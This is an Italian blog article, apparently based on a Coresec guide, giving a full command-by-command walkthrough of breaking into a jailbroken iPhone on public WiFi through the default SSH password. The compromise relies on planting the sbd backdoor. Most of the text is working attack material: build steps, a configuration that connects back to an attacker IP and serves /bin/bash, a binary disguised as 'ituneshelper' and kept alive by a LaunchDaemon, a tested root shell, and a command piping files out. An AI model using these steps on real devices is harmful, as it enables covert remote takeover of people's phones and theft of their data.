Articoli

Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.

Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.

Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

</p>
<p>iphone4:~ root# uname -an<br />
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin</p>
<p>iphone4:~ root# apt-get update<br />
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]<br />
Hit http://cydia.zodttd.com stable Release.gpg<br />
Hit http://apt.saurik.com ios/675.00 Release.gpg<br />
Hit http://repo.insanelyi.com ./ Release.gpg<br />
...</p>
<p>iphone4:~ root# apt-get install iphone-gcc<br />
Reading package lists... Done<br />
Building dependency tree<br />
Reading state information... Done<br />
...<br />
Setting up ldid (610-5) ...<br />
Setting up com.sull.iphone-gccheaders (1.0-11) ...<br />
Setting up com.sull.fake-libgcc (1.0-2) ...<br />
Setting up iphone-gcc (4.2-20080604-1-8) ...</p>
<p>iphone4:~/sbd-1.36 root# apt-get install make<br />
Reading package lists... Done<br />
Building dependency tree<br />
Reading state information... Done<br />
...<br />
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...<br />
Setting up make (3.81-2) ...</p>
<p>

Scarichiamo ed estraiamo la Backdoor

</p>
<p>iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz<br />
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz<br />
Resolving packetstorm.tacticalflex.com... 173.160.180.156<br />
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 84093 (82K) [application/x-gzip]<br />
Saving to: `sbd-1.36.tar.gz'</p>
<p>100%[======================================&gt;] 84,093 66.3K/s in 1.2s</p>
<p>2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]</p>
<p>iphone4:~ root# tar -zxvf sbd-1.36.tar.gz<br />
sbd-1.36/<br />
sbd-1.36/sbd.c<br />
sbd-1.36/doexec.c<br />
sbd-1.36/pel.c<br />
sbd-1.36/aes.c<br />
sbd-1.36/sha1.c<br />
sbd-1.36/socket_code.h<br />
sbd-1.36/pel.h<br />
sbd-1.36/aes.h<br />
sbd-1.36/sha1.h<br />
sbd-1.36/sbd.h<br />
sbd-1.36/doexec_unix.h<br />
sbd-1.36/doexec_win32.h<br />
sbd-1.36/readwrite.h<br />
sbd-1.36/misc.h<br />
sbd-1.36/Makefile<br />
sbd-1.36/mktarball.sh<br />
sbd-1.36/README<br />
sbd-1.36/COPYING<br />
sbd-1.36/CHANGES<br />
sbd-1.36/binaries/<br />
sbd-1.36/binaries/sbd.exe<br />
sbd-1.36/binaries/sbdbg.exe</p>
<p>iphone4:~ root# cd sbd-1.36<br />
iphone4:~/sbd-1.36 root# ls -al<br />
total 224<br />
drwx------ 3 1000 100 748 Sep 17 2004 ./<br />
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../<br />
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES<br />
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING<br />
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile<br />
-rw------- 1 1000 100 4880 Sep 11 2004 README<br />
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c<br />
-rw------- 1 1000 100 549 Jun 11 2004 aes.h<br />
drwx------ 2 1000 100 136 Sep 11 2004 binaries/<br />
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c<br />
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h<br />
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h<br />
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h<br />
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*<br />
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c<br />
-rw------- 1 1000 100 898 Sep 9 2004 pel.h<br />
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h<br />
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c<br />
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h<br />
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c<br />
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h<br />
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h</p>
<p>

Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

</p>
<p>iphone4:~/sbd-1.36 root# cat sbd.h<br />
#define SOURCE_PORT 0<br />
#define CONVERT_TO_CRLF 0<br />
#define ENCRYPTION 1<br />
#define SHARED_SECRET &quot;password&quot;<br />
#define QUIET 0<br />
#define VERBOSE 0<br />
#define DAEMONIZE 0<br />
#define HIGHLIGHT_INCOMING 0<br />
#define HIGHLIGHT_PREFIX &quot;\x1b[0;32m&quot;<br />
#define HIGHLIGHT_SUFFIX &quot;\x1b[0m&quot;<br />
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA &quot;: &quot;<br />
#define RUN_ONLY_ONE_INSTANCE 0<br />
#define INSTANCE_SEMAPHORE &quot;shadowinteger_bd_semaphore&quot;</p>
<p>/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.<br />
* reconnect every 10 seconds.<br />
*/</p>
<p>#define DOLISTEN 0<br />
#define HOST &quot;192.168.200.22&quot;<br />
#define PORT 443<br />
#define RESPAWN_ENABLED 1<br />
#define RESPAWN_INTERVAL 10<br />
#define EXECPROG &quot;/bin/bash&quot;</p>
<p>

Compiliamo SBD

<br />
&lt;pre&gt;iphone4:~/sbd-1.36 root# make<br />
usage:<br />
make unix - Linux, NetBSD, FreeBSD, OpenBSD<br />
make sunos - SunOS (Solaris)<br />
make win32 - native win32 console app (w/ Cygwin + MinGW)<br />
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)<br />
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app<br />
make mingw - native win32 console app (w/ MinGW MSYS)<br />
make mingwbg - native win32 no-console app (w/ MinGW MSYS)<br />
make cygwin - Cygwin console app<br />
make darwin - Darwin</p>
<p>iphone4:~/sbd-1.36 root# make darwin<br />
rm -f sbd sbd.exe *.o core<br />
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c<br />
strip sbd</p>
<p>iphone4:~/sbd-1.36 root# ls -al sbd<br />
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*<br />

Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

<br />
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper<br />
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/<br />
iphone4:/Library/LaunchDaemons root# ls -al<br />
total 16<br />
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./<br />
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../<br />
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist</p>
<p>iphone4:/Library/LaunchDaemons root# cat &lt;&lt; EOF &gt;&gt; com.ituneshelper.start.plist<br />
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br />
&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;<br />
&lt;plist version=&quot;1.0&quot;&gt;<br />
&lt;dict&gt;<br />
&lt;key&gt;Label&lt;/key&gt;<br />
&lt;string&gt;com.ituneshelper.start&lt;/string&gt;<br />
&lt;key&gt;ProgramArguments&lt;/key&gt;<br />
&lt;array&gt;<br />
&lt;string&gt;/usr/bin/ituneshelper&lt;/string&gt;<br />
&lt;/array&gt;<br />
&lt;key&gt;RunAtLoad&lt;/key&gt;<br />
&lt;true/&gt;<br />
&lt;key&gt;StartInterval&lt;/key&gt;<br />
&lt;integer&gt;1&lt;/integer&gt;<br />
&lt;/dict&gt;<br />
&lt;/plist&gt;<br />
EOF</p>
<p>iphone4:/Library/LaunchDaemons root# ls -al<br />
total 16<br />
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./<br />
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../<br />
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist<br />
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist<br />

L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

<br />
[email protected]resec:~# uname -an<br />
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux</p>
<p>[email protected]:~# ifconfig<br />
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e<br />
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0<br />
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link<br />
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1<br />
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0<br />
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0<br />
          collisions:0 txqueuelen:1000<br />
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)</p>
<p>[email protected]:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password<br />
id<br />
uid=0(root) gid=0(wheel) groups=0(wheel)<br />
/bin/bash -i<br />
bash: no job control in this shell<br />
bash-4.0# ps -ef<br />
UID PID PPID C STIME TTY TIME CMD<br />
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd<br />
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System<br />
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd<br />
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd<br />
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd<br />
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic<br />
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard<br />
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled<br />
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd<br />
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd<br />
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd<br />
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd<br />
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid<br />
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd<br />
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd<br />
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted<br />
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd<br />
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent<br />
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd<br />
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd<br />
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90<br />
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd<br />
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd<br />
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated<br />
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer<br />
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd<br />
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper<br />
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd<br />
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail<br />
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone<br />
0 286 94 0 0:00.00 ?? 0:00.03 bash<br />
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i<br />
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef</p>
<p>bash-4.0# uname -an<br />
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin<br />

Se per esempio vogliamo trasferire un file dal dispositivo

<br />
[email protected]:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret &gt; output.file</p>
<p>iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345<br />

Infine vi riportiamo la procedura per disinstallare la Backdoor

<br />
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist<br />
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper<br />